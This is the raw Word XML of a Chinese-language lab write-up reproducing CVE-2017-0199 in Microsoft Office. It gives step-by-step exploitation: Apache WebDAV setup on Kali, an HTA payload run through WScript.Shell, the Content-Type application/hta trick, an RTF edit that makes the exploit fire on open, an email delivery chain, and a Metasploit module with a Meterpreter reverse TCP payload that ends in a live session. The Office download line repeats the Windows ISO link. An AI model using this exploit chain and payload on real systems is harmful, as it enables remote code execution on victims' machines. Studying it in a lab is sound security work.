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cve-2017-0199"/>
      <w:r>
        <w:t>CVE-2017-0199</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="测试环境"/>
      <w:r>
        <w:t>测试环境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73"/>
        <w:gridCol w:w="1686"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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推荐环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w: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操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Windows 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Service Pack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漏洞软件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Office</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>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虚拟机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>VMware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>16.2.3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调试器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>OllyDBG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>2.0.1-32位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反汇编工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>IDA Pro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="24"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>6.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>影响范围：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>office 2007</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>office 2010</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>office 2013</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>office 2016</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="环境搭建"/>
      <w:r>
        <w:t>环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://msdn.itellyou.cn/" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:t>https://msdn.itellyou.cn/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Windows 7 sp 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>Office 2016</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="漏洞复现"/>
      <w:r>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>检测一下ActiveX是否被默认禁止执行hta程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>查看注册表中“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility{3050f4d8-98b5-11cf-BB82-00AA00BDCE0B}”的“Compatibility Flags”项是否为0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>如果为400，就修改成0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="266954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96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如果是被禁的话，会提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>用于创建此对象的程序是Word，您的计算机尚未安装此程序或此程序无响应</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>去我们有Apache服务的Kali服务器上，Apache需要开启DAV支持</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>a2enmod dav</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>a2enmod dav_fs</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>a2enmod dav_lock</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>a2enmod headers</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>systemctl restart apache2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">kali的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>/var/www/html/</w:t>
      </w:r>
      <w:r>
        <w:t>下,创建一个文本，先写上任意内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="220599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63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记录kali IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2600325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09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在受害机上新建word文档，并且导入对象</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>http://192.168.254.128/Click.rtf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3035935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360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正常显示内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2291715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917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修改kali中Click.rtf文档</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1605280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53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6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="69"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="59"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="69"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="56"/>
        </w:rPr>
        <w:t>ActiveXObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="69"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="47"/>
        </w:rPr>
        <w:t>"WScript.Shell"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a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="59"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="56"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="69"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="47"/>
        </w:rPr>
        <w:t>'%windir%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="46"/>
        </w:rPr>
        <w:t>\S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="47"/>
        </w:rPr>
        <w:t>ystem32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="46"/>
        </w:rPr>
        <w:t>\c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="47"/>
        </w:rPr>
        <w:t>md.exe /c calc.exe'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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="59"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
        </w:rPr>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="59"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="56"/>
        </w:rPr>
        <w:t>close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="69"/>
        </w:rPr>
        <w:t>()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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>更改Apache的配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2972435"/>
            <wp:effectExtent l="0" t="0" r="0" b="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724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6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>Dav on
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">Header set Content-Type "application/hta"  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>Dav on</w:t>
      </w:r>
      <w:r>
        <w:t>确保我们能够远程在kali服务器下载内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>Header set Content-Type "application/hta"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 确保我们访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>http://192.168.254.128/Click.rtf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 时，Content-Type为application/hta，该代码指示资源的MIME 类型为hta脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>保存配置，重启一下服务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>systemctl restart apache2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>我们可以抓包验证一下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1883410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835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此时我们再受害机上打开文档，再次点击Chick_on_this，触发远程代码执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3776980"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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69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这需要我们手动点击才能触发，我们可以利用rtf文件的特性，利用记事本打开文件，把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>{\object\objautlink\rsltpict</w:t>
      </w:r>
      <w:r>
        <w:t>然后将其替换为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>{\object\objautlink\objupdate\rsltpict</w:t>
      </w:r>
      <w:r>
        <w:t>,保存</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="977900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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7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这样直接打开word文档就能触发</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3826510"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr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269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3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="漏洞分析"/>
      <w:r>
        <w:t>漏洞分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>这个漏洞与RTF里面的OLE对象序列化有关</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1442720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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28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控制字 "\object"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>"\objautlink"定义了对象类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>"Object data"被 "\objdata"控制字定义</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1470025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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700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6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>头部</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>01 05 00 00    // Version</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>02 00 00 00</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>09 00 00 00</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>4f 4c 45 32 4c 69 6e 6b 00   //“OLE2Link”, could be anything</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>00 00 00 00</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>00 00 00 00</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>00 0a 00 00    // Data Length</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>d0cf11e0a1b11ae1000000000000000000000000000000003e</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> "d0cf11e0"指明这是一个OLE结构的流，我们可以用oletools看看</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2999740"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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0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这里StdOleLink，它定义了这是一个“链接”对象，而不是“嵌入”。StdOleLink这样一个结构会导致URL Moniker对象被运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>URL Moniker有它寻找目标对象的特殊方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>如果URL 字符串以“http”开始，首先，URL Moniker尝试去从服务器下载资源(到IE缓存)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>基于资源的多个属性，一个OLE服务器被选中</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>"Content-Type"的值</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>扩展名</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>通过OLE API "GetClassFile()"</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>最终，被选中的对象运行以处理资源</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>我们将"Content-Type"的值改成了application/hta，那我们传入的资源被当作一个hta脚本文件，将被COM/OLE服务器"mshta.exe"加载并且运行，实现我们的远程代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="4286250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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那我们的攻击步骤就是</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>攻击者通过电子邮件向目标用户发送含有OLE2嵌入式链接对象的Microsoft Word文档。</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>当用户打开文档时，winword.exe将会向远程服务器发出HTTP请求，以索取恶意HTA文件。</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>服务器返回的文件是一个带有嵌入式恶意脚本的假RTF文件。</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>Winword.exe通过COM对象查找application / hta的文件处理程序，从而导致Microsoft HTA应用程序（mshta.exe）加载并执行恶意脚本。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="漏洞利用"/>
      <w:r>
        <w:t>漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>再kali上打开msf，搜索我们的CVE-2017-0199</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>search CVE-2017-0199</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2392680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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931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加载该模块，并开始设置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>use 0</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="4163060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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631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把那个攻击文档复制出来</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1430020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /root/.msf4/local/msf.doc ./ </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>把msf.doc放到受害机上并打开</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3398520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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87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kali这边已经成功上线了</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="34"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3129280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://bbs.pediy.com/thread-219234.html" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:t>Moniker魔法：直接在Microsoft Office中运行脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.code2sec.com/officelou-dong-cve-2017-0199fu-xian-hta-handler-vulnerabilityyi.html" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
